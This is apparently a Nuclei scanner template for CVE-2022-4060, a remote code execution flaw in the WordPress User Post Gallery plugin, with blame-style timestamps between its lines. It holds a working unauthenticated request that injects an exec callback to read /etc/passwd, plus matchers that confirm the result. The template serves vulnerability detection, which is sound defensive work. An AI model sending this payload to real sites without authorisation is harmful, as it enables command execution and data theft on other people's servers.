2023-03-05 13:42:10 +00:00
id : CVE-2022-4060
info :
2023-03-27 17:46:47 +00:00
name : WordPress User Post Gallery <=2.19 - Remote Code Execution
2023-03-05 13:42:10 +00:00
author : theamanrawat
severity : critical
description : |
2023-03-27 17:46:47 +00:00
WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
2023-09-06 11:59:08 +00:00
remediation : |
Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability.
2023-03-05 13:42:10 +00:00
reference :
- https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e
- https://wordpress.org/plugins/wp-upg/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4060
2024-01-29 17:11:14 +00:00
- https://github.com/im-hanzou/UPGer
- https://github.com/nomi-sec/PoC-in-GitHub
2023-03-05 13:42:10 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-4060
cwe-id : CWE-94
2024-03-23 09:28:19 +00:00
epss-score : 0.03753
2024-04-08 11:34:33 +00:00
epss-percentile : 0.91618
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : odude
product : user_post_gallery
2023-09-06 11:59:08 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"
matchers-condition : and
matchers :
- type : word
part : header
words :
- "application/json"
- type : word
part : body
words :
- "recordsFiltered"
2023-07-11 19:49:27 +00:00
- type : regex
part : body
regex :
- "root:.*:0:0:"
2023-03-05 13:42:10 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 490a0046304402200654ec12187c127abd7ddbeaaa97db5da699aae212f58f56dbdd9b3c3592da7d02205785dd9471edbb3f65c8fc27fb262bbb41ca3ef683dd42409e9fa2622df41348:922c64590222798bb761d5b6d8e72950